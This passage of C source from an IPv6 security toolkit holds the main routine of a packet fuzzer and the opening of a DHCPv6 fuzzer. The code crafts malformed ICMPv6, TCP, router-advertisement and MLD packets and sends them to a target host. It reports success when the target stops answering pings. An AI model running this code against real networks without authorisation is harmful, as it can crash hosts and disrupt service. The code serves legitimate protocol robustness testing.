      thc_ping26(interface, srcmac, dstmac, src, dst, 16, 1);
      state = -1;
    }
    if (time(NULL) > started + 4)
      state = 0;
  }

  return state > 0;
}
int main(int argc, char *argv[]) { unsigned char *pkt = NULL, *pkt_bak, *mcast6, *someaddr6 = NULL; unsigned char *dst6, *src6 = NULL, *mac = NULL, *routers[2], string[64] = "ip6 and dst "; int test_start = 0, fragment = 0, alert = 0, sroute = 0; int do_type = DO_PING, do_alive = 1, hopbyhop = 0, destination = 0, jumbo = 0; int pkt_len = 0, offset = 0, test_current = 0, i, j, k, do_fuzz = 1, test_ptr = 0; int test_end = TEST_MAX, ping = NEVER, frag_offset = 0, header = 0, no_send = 1; int test_pos = 0, test_cnt = 0, do_it, extend = 0, mtu = 1500, size = 64, wait = 0, off2 = 14; char *interface, fuzzbuf[256], *srcmac, *dns, *route6, *real_dst6 = NULL; unsigned char buf[256], buf2[100], buf3[16]; unsigned short int *sip; pcap_t *p; thc_ipv6_hdr *hdr; if (argc < 3 || strncmp(argv[1], "-h", 2) == 0) help(argv[0]); while ((i = getopt(argc, argv, "s:0123456789Xxt:T:p:FSDHRIJan:")) >= 0) { switch (i) { case 's': do_type = DO_TCP; port = atoi(optarg); break; case '0': do_type = DO_NODEQUERY; break; case '1': do_type = DO_PING; break; case '2': do_type = DO_NEIGHSOL; break; case '3': do_type = DO_NEIGHADV; break; case '4': do_type = DO_RA; break; case '5': do_type = DO_MLD_REP; break; case '6': do_type = DO_MLD_DONE; break; case '7': do_type = DO_MLD_QUERY; wait = 0xff0000; break; case '8': do_type = DO_MLD2_REPORT; break; case '9': do_type = DO_MLD2_QUERY; wait = 0xff0000; break; case 'X': do_type = DO_NONE; break; case 't': test_start = atoi(optarg); break; case 'T': test_end = test_start = atoi(optarg); break; case 'p': ping = atoi(optarg); break; case 'a': do_alive = 0; break; case 'S': sroute = 1; break; case 'n': no_send = atoi(optarg); break; case 'F': fragment = 1; break; case 'R': alert = 1; break; case 'D': destination = 1; break; case 'H': hopbyhop = 1; break; case 'J': jumbo = 1; break; case 'I': header = 1; break; case 'x': extend = 1; break; } } if (argc - optind < 2) { fprintf(stderr, "ERROR: not enough options, interface and target address are 
required!\n"); exit(-1); } interface = argv[optind]; if ((srcmac = thc_get_own_mac(interface)) == NULL) { fprintf(stderr, "ERROR: %s is not a valid interface which has a MAC, use raw mode?\n", interface); exit(-1); } if (no_send < 1) { fprintf(stderr, "ERROR: -n number must be between one and 2 billion\n"); exit(-1); } if (do_hdr_size) { test_pos -= do_hdr_size; offset -= do_hdr_size; off2 = do_hdr_size; } if (do_type != DO_PING && do_type != DO_TCP && do_type != DO_NONE) { if ((mcast6 = thc_resolve6(argv[optind + 1])) == NULL) { fprintf(stderr, "Error: %s does not resolve to a valid IPv6 address\n", argv[optind + 1]); exit(-1); } if (do_type == DO_NEIGHSOL) { dst6 = thc_resolve6("ff02::0001:ff00:0000"); memcpy(dst6 + 13, mcast6 + 13, 3); } else dst6 = thc_resolve6("ff02::1"); } else { dst6 = thc_resolve6(argv[optind + 1]); } if (argv[optind + 1] != NULL) if ((real_dst6 = thc_resolve6(argv[optind + 1])) == NULL) { fprintf(stderr, "Error: %s does not resolve to a valid IPv6 address\n", argv[optind + 1]); exit(-1); } if (interface == NULL || argv[optind + 1] == NULL) { printf("Error: interface and target-ipv6-address are mandatory command line options\n"); exit(-1); } if (ping < 1 || test_end < test_start) { printf("don't fuck up the command line options!\n"); exit(-1); } if (argv[optind + 2] != NULL) someaddr6 = thc_resolve6(argv[optind + 2]); if (argc - optind > 3) { printf("Error: too many command line options\n"); exit(-1); } if ((mac = thc_get_mac(interface, src6, dst6)) == NULL) { fprintf(stderr, "ERROR: Can not resolve mac address for %s\n", argv[2]); exit(-1); } if (do_type == DO_PING || do_type == DO_TCP || do_type == DO_NONE) src6 = thc_get_own_ipv6(interface, dst6, PREFER_GLOBAL); else src6 = thc_get_own_ipv6(interface, dst6, PREFER_LINK); if (src6 == NULL) { fprintf(stderr, "Error: no IPv6 address configured on interface %s\n", interface); exit(-1); } strcat(string, thc_ipv62notation(src6)); if (sroute) { if (someaddr6 != NULL) routers[0] = someaddr6; 
else routers[0] = dst6; routers[1] = NULL; } setvbuf(stdout, NULL, _IONBF, 0); memset(buf, 0, sizeof(buf)); memset(buf2, 0, sizeof(buf2)); dns = thc_resolve6("ff02::fb"); route6 = thc_resolve6("2a01::"); if ((p = thc_pcap_init(interface, string)) == NULL) { fprintf(stderr, "Error: could not capture on interface %s with string %s\n", interface, string); exit(-1); } if (real_dst6 != NULL && real_dst6[0] == 0xff) do_alive = 0; // ping before to check if it works if (do_alive) if (check_alive(p, interface, srcmac, mac, src6, real_dst6) == 0) { fprintf(stderr, "Error: target %s is not alive via direct ping6!\n", argv[optind + 1]); exit(-1); } // generate basic packet strcpy(fuzzbuf, fuzztype_ether); if ((pkt = thc_create_ipv6_extended(interface, PREFER_GLOBAL, &pkt_len, src6, dst6, 0, 0, 0, 0, 0)) == NULL) return -1; if (header) strcat(fuzzbuf, fuzztype_ip6); else strcat(fuzzbuf, fuzztype_ip6no); if (alert || hopbyhop || jumbo) { memset(buf2, 0, sizeof(buf2)); i = 0; if (alert) { buf2[i++] = 5; buf2[i++] = 2; i += 2; strcat(fuzzbuf, ".F.F"); } if (jumbo) { buf2[i++] = 0xc2; buf2[i++] = 4; buf2[i++] = 'J'; // lookup code buf2[i++] = 'J'; buf2[i++] = 'J'; buf2[i++] = 'J'; strcat(fuzzbuf, ".FBBBB"); } if (hopbyhop) { memset(buf3, 0, sizeof(buf3)); buf3[0] = 'X'; buf3[1] = '.'; for (j = 0; j < 10; j++) { buf2[i++] = 1; // PadN, length buf2[i++] = j; if (j > 0) { memset(buf2 + i, 0xaa, j); buf3[2 + j] = '.'; i += j; } strcat(fuzzbuf, buf3); // always: X... 
for every new option } } if (thc_add_hdr_hopbyhop(pkt, &pkt_len, buf2, i) < 0) return -1; i += 2; if (i % 8 > 0) i = ((i / 8) + 1) * 8; offset += i; } if (sroute) { if (thc_add_hdr_route(pkt, &pkt_len, routers, 1) < 0) return -1; else { strcat(fuzzbuf, "FFFFBBBB................"); offset += 24; } } if (fragment) { frag_offset = offset; if (thc_add_hdr_fragment(pkt, &pkt_len, 0, 0, 0) < 0) return -1; else { strcat(fuzzbuf, "FFWW.."); offset += 8; } } if (destination) { memset(buf2, 0, sizeof(buf2)); memset(buf3, 0, sizeof(buf3)); buf3[0] = 'X'; buf3[1] = '.'; i = 0; for (j = 0; j < 10; j++) { buf2[i++] = 1; // PadN, length buf2[i++] = j; if (j > 0) { memset(buf2 + i, 0xaa, j); buf3[2 + j] = '.'; i += j; } strcat(fuzzbuf, buf3); // always: X... for every new option } if (thc_add_hdr_dst(pkt, &pkt_len, buf2, i) < 0) return -1; i += 2; if (i % 8 > 0) i = ((i / 8) + 1) * 8; offset += i; } memset(buf, 0, sizeof(buf)); // if (header) strcat(fuzzbuf, fuzztype_icmp6); // else // strcat(fuzzbuf, fuzztype_icmp6no); switch (do_type) { case DO_TCP: // tcp options buf[0] = 2; // max segment size buf[1] = 4; buf[2] = 255; buf[3] = 255; buf[4] = 3; // windows size buf[5] = 3; buf[6] = 62; buf[7] = 1; // padding buf[8] = 8; // timestamp buf[9] = 10; buf[10] = time(NULL) / 16777216; buf[11] = ((time(NULL) / 65536) % 256); buf[12] = ((time(NULL) / 256) % 256); buf[13] = time(NULL) % 256; // 4 bytes ack tstamp 00000000 // rest is padding (2 bytes) if (thc_add_tcp(pkt, &pkt_len, 65532, port, test_current, 0, TCP_SYN, 5760, 0, (unsigned char *) buf, 20, (unsigned char *) buf, 20) < 0) return -1; strcat(fuzzbuf, fuzztype_tcp); break; case DO_PING: if (thc_add_icmp6(pkt, &pkt_len, ICMP6_PINGREQUEST, 0, test_current, (unsigned char *) &buf, 16, 0) < 0) return -1; strcat(fuzzbuf, fuzztype_icmp6ping); break; case DO_NONE: // empty break; case DO_NEIGHSOL: if (someaddr6 != NULL) memcpy(buf, someaddr6, 16); else memcpy(buf, mcast6, 16); buf[16] = 1; buf[17] = 1; memcpy(buf + 18, srcmac, 6); if 
(thc_add_icmp6(pkt, &pkt_len, ICMP6_NEIGHBORSOL, 0, 0, (unsigned char *) &buf, 24, 0) < 0) return -1; strcat(fuzzbuf, fuzztype_icmp6ns); break; case DO_NEIGHADV: if (someaddr6 != NULL) memcpy(buf, someaddr6, 16); else memcpy(buf, src6, 16); buf[16] = 2; buf[17] = 1; memcpy(buf + 18, srcmac, 6); if (thc_add_icmp6(pkt, &pkt_len, ICMP6_NEIGHBORADV, 0, 0xe0000000, (unsigned char *) &buf, 24, 0) < 0) return -1; strcat(fuzzbuf, fuzztype_icmp6na); break; case DO_NODEQUERY: memcpy(buf + 8, real_dst6, 16); if (thc_add_icmp6(pkt, &pkt_len, ICMP6_NODEQUERY, 0, 0x0003003e, (unsigned char *) &buf, 24, 0) < 0) return -1; strcat(fuzzbuf, fuzztype_icmp6nq); break; case DO_RA: // buf[3] = 250; // 0-3: reachable timer buf[6] = 4; // 4-7: retrans timer // option mtu buf[8] = 5; buf[9] = 1; buf[12] = mtu / 16777216; buf[14] = (mtu % 65536) / 256; buf[15] = mtu % 256; // option prefix buf[16] = 3; buf[17] = 4; buf[18] = size; // prefix length buf[19] = 128 + 64; memset(&buf[20], 17, 4); memset(&buf[24], 4, 4); if (someaddr6 != NULL) memcpy(&buf[32], someaddr6, 16); else memcpy(&buf[32], route6, 16); i = 48; // mac address option buf[i++] = 1; buf[i++] = 1; memcpy(buf + i, srcmac, 6); i += 6; // = 8 == 56 // default route routing option buf[i++] = 0x18; // routing entry option type buf[i++] = 0x03; // length 3 == 24 bytes buf[i++] = 64; // prefix length /64 buf[i++] = 0x08; // priority, highest of course i += 2; // 52-53 unknown buf[i++] = 0x11; // lifetime, word buf[i++] = 0x11; // lifetime, word buf[i++] = 0x20; buf[i++] = 4; // 56-71 address, 2004:: for default i += 14; // = 24 == 70 // dns option buf[i++] = 0x19; // dns option type buf[i++] = 0x03; // length i += 2; // 74-75 reserved memset(buf + i, 1, 4); // validity time i += 4; if (someaddr6 != NULL) memcpy(buf + i, someaddr6, 16); // dns server else memcpy(buf + i, dns, 16); // dns server i += 16; // = 24 == 94 // seachlist option buf[i++] = 31; buf[i++] = 4; i += 2; memset(buf + i, 1, 4); // validity time i += 4; buf[i++] = 3; 
memcpy(buf + i, "foo", 3); i += 3; buf[i++] = 4; memcpy(buf + i, "corp", 4); i += 5; // + null byte buf[i++] = 5; memcpy(buf + i, "local", 5); i += 5; buf[i++] = 6; memcpy(buf + i, "domain", 6); i += 7; // + null byte // = 32 == 126 // flag extension option buf[i++] = 26; buf[i++] = 1; buf[i++] = 0x08; i += 5; if (thc_add_icmp6(pkt, &pkt_len, ICMP6_ROUTERADV, 0, 0xff080800, buf, i, 0) < 0) return -1; strcat(fuzzbuf, fuzztype_icmp6ra); break; case DO_MLD_QUERY: case DO_MLD_DONE: case DO_MLD_REP: buf[0] = 0xff; buf[1] = 0x02; buf[15] = 0x05; if (someaddr6 != NULL) memcpy(buf, someaddr6, 16); if (thc_add_icmp6(pkt, &pkt_len, do_type, 0, wait, buf, 16, 0) < 0) return -1; strcat(fuzzbuf, fuzztype_icmp6mld); break; case DO_MLD2_QUERY: buf[0] = 0xff; buf[1] = 0x02; buf[15] = 0x05; if (someaddr6 != NULL) memcpy(buf, someaddr6, 16); buf[16] = 7; buf[17] = 120; buf[19] = 3; memcpy(buf + 20, dst6, 16); memcpy(buf + 36, buf, 16); if (thc_add_icmp6(pkt, &pkt_len, DO_MLD_QUERY, 0, wait, buf, 68, 0) < 0) return -1; strcat(fuzzbuf, fuzztype_icmp6mld2que); break; case DO_MLD2_REPORT: for (i = 0; i < 3; i++) { buf[0 + 68 * i] = 1 + i * 2 - i / 2; //include new++, generates 1, 3 and 4 buf[3 + 68 * i] = 3; //3 sources buf[4 + 68 * i] = 0xff; buf[5 + 68 * i] = 0x02; buf[18 + 68 * i] = 0x82 + i % 256; buf[19 + 68 * i] = 0xff; memcpy(buf + 20 + 68 * i, src6, 16); buf[36 + 68 * i] = 0xfe; buf[37 + 68 * i] = 0x80; buf[46 + 68 * i] = 0xf0; if (someaddr6 != NULL) memcpy(buf + 52 + 68 * i, someaddr6, 16); } if (thc_add_icmp6(pkt, &pkt_len, do_type, 0, 3, buf, 208, 0) < 0) return -1; strcat(fuzzbuf, fuzztype_icmp6mld2rep); break; default: fprintf(stderr, "ERROR: Mode not implemented yet!\n"); exit(-1); } if (thc_generate_pkt(interface, srcmac, mac, pkt, &pkt_len) < 0) return -1; hdr = (thc_ipv6_hdr *) pkt; if (jumbo) { i = 0; j = 1; while (i < hdr->pkt_len + 4 && j) { if (hdr->pkt[i] == 'J') if (memcmp(&hdr->pkt[i], "JJJJ", 4) == 0) j = 0; i++; } if (j) { fprintf(stderr, "ERROR: fuckup, cant 
find my own marker?!\n"); exit(-1); } else i--; hdr->pkt[i] = 0; hdr->pkt[i + 1] = 0; hdr->pkt[i + 2] = hdr->pkt[4 + off2]; hdr->pkt[i + 3] = hdr->pkt[5 + off2]; hdr->pkt[4 + off2] = 0; hdr->pkt[5 + off2] = 0; } if (extend) for (i = 0; i < strlen(fuzzbuf); i++) if (fuzzbuf[i] == 'B' || fuzzbuf[i] == 'F') fuzzbuf[i] = 'X'; // backup of generated packet pkt_bak = malloc(hdr->pkt_len); memcpy(pkt_bak, hdr->pkt, hdr->pkt_len); printf("Fuzzing packet, starting at fuzz case %d, ending at fuzz case %d, every packet sent denoted by a dot:\n", test_start, test_end); //printf("buf(%d): %s\n", strlen(fuzzbuf), fuzzbuf); while (do_fuzz) { if (test_cnt == 0) while (fuzzbuf[test_ptr] == '.') { test_ptr++; test_pos++; } if (fuzzbuf[test_ptr] == 0) do_fuzz = 0; test_cnt++; do_it = 1; //printf("[%s] pos[%d]=%c -> %d | pkt[%d] | %d (%d=>%d)| ", /*fuzzbuf*/"", test_ptr, fuzzbuf[test_ptr], test_cnt, test_pos, test_current, test_start, test_end); switch (fuzzbuf[test_ptr]) { case 0: break; case 'X': if (test_cnt <= COUNT_EXTEND) { if (pkt_bak[test_pos] != extends[test_cnt - 1]) hdr->pkt[test_pos] = extends[test_cnt - 1]; else do_it = 0; } else { test_cnt = 0; test_ptr++; test_pos++; } break; case 'B': if (test_cnt <= COUNT_BYTE) { if (pkt_bak[test_pos] != bytes[test_cnt - 1]) hdr->pkt[test_pos] = bytes[test_cnt - 1]; else do_it = 0; } else { i = 0; while (i < COUNT_BYTE && do_it) { if (bytes[i] == pkt_bak[test_pos]) do_it = 0; i++; } if (do_it) hdr->pkt[test_pos] = hdr->pkt[test_pos] ^ xors[test_cnt - COUNT_BYTE - 1]; } if (test_cnt == COUNT_BYTE + COUNT_XOR) { test_cnt = 0; test_ptr++; test_pos++; } break; case 'F': if (test_cnt <= COUNT_FLAG) { if (pkt_bak[test_pos] != flags[test_cnt - 1]) hdr->pkt[test_pos] = flags[test_cnt - 1]; else do_it = 0; } else { i = 0; while (i < COUNT_FLAG && do_it) { if (bytes[i] == pkt_bak[test_pos]) // yes, bytes[] is the right one even for flags do_it = 0; i++; } if (do_it) hdr->pkt[test_pos] = hdr->pkt[test_pos] ^ xors[test_cnt - COUNT_BYTE - 1]; } if 
(test_cnt == COUNT_FLAG + COUNT_XOR) { test_cnt = 0; test_ptr++; test_pos++; } break; case 'W': sip = (unsigned short int *) &pkt_bak[test_pos]; if (test_cnt <= COUNT_WORD) { if (*sip != words[test_cnt - 1]) memcpy((char *) &hdr->pkt[test_pos], (char *) &words[test_cnt - 1] + _TAKE2, 2); else do_it = 0; } else { i = 0; while (i < COUNT_WORD && do_it) { if (words[i] == *sip) do_it = 0; i++; } if (do_it) { i = *sip ^ xors[test_cnt - COUNT_WORD - 1]; sip = (unsigned short int *) &hdr->pkt[test_pos]; *sip = i % 65536; } } if (test_cnt == COUNT_WORD + COUNT_XOR) { test_cnt = 0; test_ptr++; test_pos += 2; } break; default: fprintf(stderr, "This character should not be in the fuzz string, shoot the programmer: %c(%d) position %d string %s\n", fuzzbuf[test_ptr], fuzzbuf[test_ptr], test_ptr, fuzzbuf); exit(-1); break; } if (do_it && do_fuzz) { if (test_current >= test_start && test_current <= test_end && do_fuzz) { // fill icmp id+seq and unique buffer with test case number if (fragment) memcpy(hdr->pkt + frag_offset + 58, (char *) &test_current + _TAKE4, 4); switch (do_type) { case DO_NONE: // empty break; case DO_PING: for (i = 0; i < 4 + 1; i++) memcpy(hdr->pkt + offset + 58 + i * 4, (char *) &test_current + _TAKE4, 4); break; case DO_TCP: memcpy(hdr->pkt + offset + 58, (char *) &test_current + _TAKE4, 4); break; case DO_NEIGHSOL: case DO_NEIGHADV: break; // do nothing for these case DO_NODEQUERY: memcpy(hdr->pkt + offset + 66, (char *) &test_current + _TAKE4, 4); break; case DO_RA: memcpy(hdr->pkt + offset + 0x62, (char *) &test_current + _TAKE4, 4); // prefix update memcpy(hdr->pkt + offset + 0x7e, hdr->pkt + offset + 0x5e, 16); // routing update memcpy(hdr->pkt + 8, (char *) &test_current + _TAKE4, 4); // srcmac update memcpy(hdr->pkt + offset + 0x72, (char *) &test_current + _TAKE4, 4); // srcmac update memcpy(hdr->pkt + 0x10 + off2, (char *) &test_current + _TAKE4, 4); // srcip update memcpy(hdr->original_src, hdr->pkt + 8 + off2, 16); // srcip update for checksum 
break; case DO_MLD_QUERY: case DO_MLD_DONE: case DO_MLD_REP: case DO_MLD2_QUERY: memcpy(hdr->pkt + offset + 0x4a, (char *) &test_current + _TAKE4, 4); break; case DO_MLD2_REPORT: //??? XXX TODO CHECK memcpy(hdr->pkt + offset + 0x4d, (char *) &test_current + _TAKE4, 4); memcpy(hdr->pkt + offset + 0x4d + 68, (char *) &test_current + _TAKE4, 4); memcpy(hdr->pkt + offset + 0x4d + 136, (char *) &test_current + _TAKE4, 4); break; default: fprintf(stderr, "ERROR!!!\n"); exit(-1); } // regenerate checksum if (do_type != DO_TCP && do_type != DO_NONE) { // maybe for later non-icmp stuff hdr->pkt[offset + 56] = 0; hdr->pkt[offset + 57] = 0; i = checksum_pseudo_header(hdr->original_src, hdr->final_dst, NXT_ICMP6, &hdr->pkt[offset + 54], hdr->pkt_len - offset - 54); hdr->pkt[offset + 56] = i / 256; hdr->pkt[offset + 57] = i % 256; } else { // TCP hdr->pkt[offset + 70] = 0; hdr->pkt[offset + 71] = 0; i = checksum_pseudo_header(hdr->original_src, hdr->final_dst, NXT_TCP, &hdr->pkt[offset + 54], hdr->pkt_len - offset - 54); hdr->pkt[offset + 70] = i / 256; hdr->pkt[offset + 71] = i % 256; } // send packet for (k = 0; k < no_send; k++) { while(thc_send_pkt(interface, pkt, &pkt_len) < 0) usleep(1); } printf("."); usleep(250); // if ping, check ping again if ((test_current - test_start) % ping == 0 && test_current != 0 && test_start != test_current) if (check_alive(p, interface, srcmac, mac, src6, real_dst6) == 0) { i = ((((test_current - test_start) / ping) - 1) * ping) + test_start + 1; printf("\nResult: target %s crashed during fuzzing, offending test case no. could be %d to %d\n", argv[optind + 1], i < 0 ? 
0 : i, test_current); exit(1); } } //else printf("NOT SENT - NOT IN TEST LIST\n"); // reset to basic packet memcpy(hdr->pkt, pkt_bak, hdr->pkt_len); test_current++; } //else printf("NOT SENT!\n"); } printf("\n"); // ping afterwards to check if it worked if (do_alive) { if (check_alive(p, interface, srcmac, mac, src6, real_dst6) == 0) { printf("Result: target %s is NOT alive via direct ping6 - good work! (position: %d)\n", argv[optind + 1], test_pos); exit(1); } else printf("Result: target %s is still alive via direct ping6, better luck next time.\n", argv[optind + 1]); } thc_pcap_close(p); return 0; } thc-ipv6-2.5/fuzz_dhcps6.c0000644000000000000000000007243612251022437014141 0ustar rootroot#include #include #include #include #include #include #include #include #include #include #include #include #include "thc-ipv6.h" #define COUNT_FLAG 11 #define COUNT_BYTE 4 #define COUNT_WORD 16 #define COUNT_XOR 2 #define COUNT_EXTEND 256 #define COUNT_DWORD 256 #define NEVER 2000000000 #define TEST_MAX (NEVER - 1) #define DO_SOL 1 #define DO_REQ 2 #define DO_CON 3 #define DO_REN 4 #define DO_REB 5 #define DO_DEC 6 #define DO_REL 7 #define DO_INF 8 #define STATELESS 0 #define STATEFULL 1 /* * Fuzzing data types: * F = flags = 1 byte = 8 bits | flags | 8 ; 256 * B = byte = 1 byte | 0 1 254 255 xor XOR | 6 ; 256 * X = byte = 1 byte | all values from 0 to 255 * W = word = 2 bytes | 0,1,254,255^2 xor XOR | 18 ; 65536 * D = double word = 4 bytes | {0,1,254,255}^4 xor XOR | 258 ; 4294967295 * . 
= byte = ignore, jump over * */ char fuzztype_ether[] = ".............."; //14 byte header char fuzztype_ip6[] = "........................................"; //40 byte header char fuzztype_udp[] = "........"; //8 byte header char fuzztype_dhcp6[] = "X..."; //4 byte header (fuzz message type) char fuzztype_dhcp6no[] = "...."; //4 byte header (don't fuzz message type) //OPTION HEADERS char fuzztype_elapsed_time[] = "WWW"; //6 byte header char fuzztype_client_identifier[] = "WWWWDWWW"; //18 byte header char fuzztype_server_identifier[] = "WWWWDWWW"; //18 byte header char fuzztype_IA_NA[] = "WWDDD"; //16 byte header char fuzztype_IA_Address[] = "WWXX..............DD"; char fuzztype_FQDN[] = "WWF"; //5 byte header + length of domain string to be added in programatically char fuzztype_option_request[] = "WWW"; //6 byte header (add extra W for each additional option) // //Matched solicit from RF manual // char fuzztype_solicit[] = ".......FFFFFFFFF................BBBXXXX"; // //Still have to add in other types. 
// char fuzztype_tran_id[] = "XF..WXBXX..............XX.............."; // char fuzztype_options[] = "........................................"; unsigned char flags[] = { 0, 1, 2, 4, 8, 16, 32, 64, 128, 254, 255 }; // 11 unsigned char bytes[] = { 0, 1, 254, 255 }; // 4 unsigned short int words[] = { 0x0000, 0x0001, 0x00fe, 0x00ff, 0x0100, 0x0101, 0x01fe, 0x01ff, 0xfe00, 0xfe01, 0xfefe, 0xfeff, 0xff00, 0xff01, 0xfffe, 0xffff }; // 16 unsigned int xors[] = { 0, 0xffffffff }; // 2 unsigned char extends[] = { 0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16, 17, 18, 19, 20, 21, 22, 23, 24, 25, 26, 27, 28, 29, 30, 31, 32, 33, 34, 35, 36, 37, 38, 39, 40, 41, 42, 43, 44, 45, 46, 47, 48, 49, 50, 51, 52, 53, 54, 55, 56, 57, 58, 59, 60, 61, 62, 63, 64, 65, 66, 67, 68, 69, 70, 71, 72, 73, 74, 75, 76, 77, 78, 79, 80, 81, 82, 83, 84, 85, 86, 87, 88, 89, 90, 91, 92, 93, 94, 95, 96, 97, 98, 99, 100, 101, 102, 103, 104, 105, 106, 107, 108, 109, 110, 111, 112, 113, 114, 115, 116, 117, 118, 119, 120, 121, 122, 123, 124, 125, 126, 127, 128, 129, 130, 131, 132, 133, 134, 135, 136, 137, 138, 139, 140, 141, 142, 143, 144, 145, 146, 147, 148, 149, 150, 151, 152, 153, 154, 155, 156, 157, 158, 159, 160, 161, 162, 163, 164, 165, 166, 167, 168, 169, 170, 171, 172, 173, 174, 175, 176, 177, 178, 179, 180, 181, 182, 183, 184, 185, 186, 187, 188, 189, 190, 191, 192, 193, 194, 195, 196, 197, 198, 199, 200, 201, 202, 203, 204, 205, 206, 207, 208, 209, 210, 211, 212, 213, 214, 215, 216, 217, 218, 219, 220, 221, 222, 223, 224, 225, 226, 227, 228, 229, 230, 231, 232, 233, 234, 235, 236, 237, 238, 239, 240, 241, 242, 243, 244, 245, 246, 247, 248, 249, 250, 251, 252, 253, 254, 255 }; // 256 unsigned int dwords[] = { 0x00000000, 0x00000001, 0x000000fe, 0x000000ff, 0x00000100, 0x00000101, 0x000001fe, 0x000001ff, 0x0000fe00, 0x0000fe01, 0x0000fefe, 0x0000feff, 0x0000ff00, 0x0000ff01, 0x0000fffe, 0x0000ffff, 0x00010000, 0x00010001, 0x000100fe, 0x000100ff, 0x00010100, 0x00010101, 0x000101fe, 
0x000101ff, 0x0001fe00, 0x0001fe01, 0x0001fefe, 0x0001feff, 0x0001ff00, 0x0001ff01, 0x0001fffe, 0x0001ffff, 0x00fe0000, 0x00fe0001, 0x00fe00fe, 0x00fe00ff, 0x00fe0100, 0x00fe0101, 0x00fe01fe, 0x00fe01ff, 0x00fefe00, 0x00fefe01, 0x00fefefe, 0x00fefeff, 0x00feff00, 0x00feff01, 0x00fefffe, 0x00feffff, 0x00ff0000, 0x00ff0001, 0x00ff00fe, 0x00ff00ff, 0x00ff0100, 0x00ff0101, 0x00ff01fe, 0x00ff01ff, 0x00fffe00, 0x00fffe01, 0x00fffefe, 0x00fffeff, 0x00ffff00, 0x00ffff01, 0x00fffffe, 0x00ffffff, 0x01000000, 0x01000001, 0x010000fe, 0x010000ff, 0x01000100, 0x01000101, 0x010001fe, 0x010001ff, 0x0100fe00, 0x0100fe01, 0x0100fefe, 0x0100feff, 0x0100ff00, 0x0100ff01, 0x0100fffe, 0x0100ffff, 0x01010000, 0x01010001, 0x010100fe, 0x010100ff, 0x01010100, 0x01010101, 0x010101fe, 0x010101ff, 0x0101fe00, 0x0101fe01, 0x0101fefe, 0x0101feff, 0x0101ff00, 0x0101ff01, 0x0101fffe, 0x0101ffff, 0x01fe0000, 0x01fe0001, 0x01fe00fe, 0x01fe00ff, 0x01fe0100, 0x01fe0101, 0x01fe01fe, 0x01fe01ff, 0x01fefe00, 0x01fefe01, 0x01fefefe, 0x01fefeff, 0x01feff00, 0x01feff01, 0x01fefffe, 0x01feffff, 0x01ff0000, 0x01ff0001, 0x01ff00fe, 0x01ff00ff, 0x01ff0100, 0x01ff0101, 0x01ff01fe, 0x01ff01ff, 0x01fffe00, 0x01fffe01, 0x01fffefe, 0x01fffeff, 0x01ffff00, 0x01ffff01, 0x01fffffe, 0x01ffffff, 0xfe000000, 0xfe000001, 0xfe0000fe, 0xfe0000ff, 0xfe000100, 0xfe000101, 0xfe0001fe, 0xfe0001ff, 0xfe00fe00, 0xfe00fe01, 0xfe00fefe, 0xfe00feff, 0xfe00ff00, 0xfe00ff01, 0xfe00fffe, 0xfe00ffff, 0xfe010000, 0xfe010001, 0xfe0100fe, 0xfe0100ff, 0xfe010100, 0xfe010101, 0xfe0101fe, 0xfe0101ff, 0xfe01fe00, 0xfe01fe01, 0xfe01fefe, 0xfe01feff, 0xfe01ff00, 0xfe01ff01, 0xfe01fffe, 0xfe01ffff, 0xfefe0000, 0xfefe0001, 0xfefe00fe, 0xfefe00ff, 0xfefe0100, 0xfefe0101, 0xfefe01fe, 0xfefe01ff, 0xfefefe00, 0xfefefe01, 0xfefefefe, 0xfefefeff, 0xfefeff00, 0xfefeff01, 0xfefefffe, 0xfefeffff, 0xfeff0000, 0xfeff0001, 0xfeff00fe, 0xfeff00ff, 0xfeff0100, 0xfeff0101, 0xfeff01fe, 0xfeff01ff, 0xfefffe00, 0xfefffe01, 0xfefffefe, 0xfefffeff, 0xfeffff00, 
0xfeffff01, 0xfefffffe, 0xfeffffff, 0xff000000, 0xff000001, 0xff0000fe, 0xff0000ff, 0xff000100, 0xff000101, 0xff0001fe, 0xff0001ff, 0xff00fe00, 0xff00fe01, 0xff00fefe, 0xff00feff, 0xff00ff00, 0xff00ff01, 0xff00fffe, 0xff00ffff, 0xff010000, 0xff010001, 0xff0100fe, 0xff0100ff, 0xff010100, 0xff010101, 0xff0101fe, 0xff0101ff, 0xff01fe00, 0xff01fe01, 0xff01fefe, 0xff01feff, 0xff01ff00, 0xff01ff01, 0xff01fffe, 0xff01ffff, 0xfffe0000, 0xfffe0001, 0xfffe00fe, 0xfffe00ff, 0xfffe0100, 0xfffe0101, 0xfffe01fe, 0xfffe01ff, 0xfffefe00, 0xfffefe01, 0xfffefefe, 0xfffefeff, 0xfffeff00, 0xfffeff01, 0xfffefffe, 0xfffeffff, 0xffff0000, 0xffff0001, 0xffff00fe, 0xffff00ff, 0xffff0100, 0xffff0101, 0xffff01fe, 0xffff01ff, 0xfffffe00, 0xfffffe01, 0xfffffefe, 0xfffffeff, 0xffffff00, 0xffffff01, 0xfffffffe, 0xffffffff }; // 256 char solicit[] = { 0x01, 0x00, 0x00, 0x00, 0x00, 0x08, 0x00, 0x02, 0x00, 0x00, 0x00, 0x01, 0x00, 0x0e, 0x00, 0x01, 0x00, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x03, 0x00, 0x0c, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00 }; int port = -1; void help(char *prg) { printf("%s %s (c) 2013 by %s %s\n\n", prg, VERSION, "Brandon Hutcheson and Graeme Neilson", RESOURCE); printf("Syntax: %s [-t number | -T number] [-e number | -T number] [-p number] [-md] [-1|-2|-3|-4|-5|-6|-7|-8] interface [domain-name]\n\n", prg); printf("Fuzzes an DHCPv6 packet\n"); printf("Options:\n"); printf(" -1 fuzz DHCPv6 Solicit (default)\n"); printf(" -2 fuzz DHCPv6 Request\n"); printf(" -3 fuzz DHCPv6 Confirm\n"); printf(" -4 fuzz DHCPv6 Renew\n"); printf(" -5 fuzz DHCPv6 Rebind\n"); printf(" -6 fuzz DHCPv6 Release\n"); printf(" -7 fuzz DHCPv6 Decline\n"); printf(" -8 fuzz DHCPv6 Information Request\n"); printf(" -m fuzz the message type as well\n"); printf(" -t number continue from test no. number\n"); printf(" -e number continue to test no. number\n"); printf(" -T number only performs test no. 
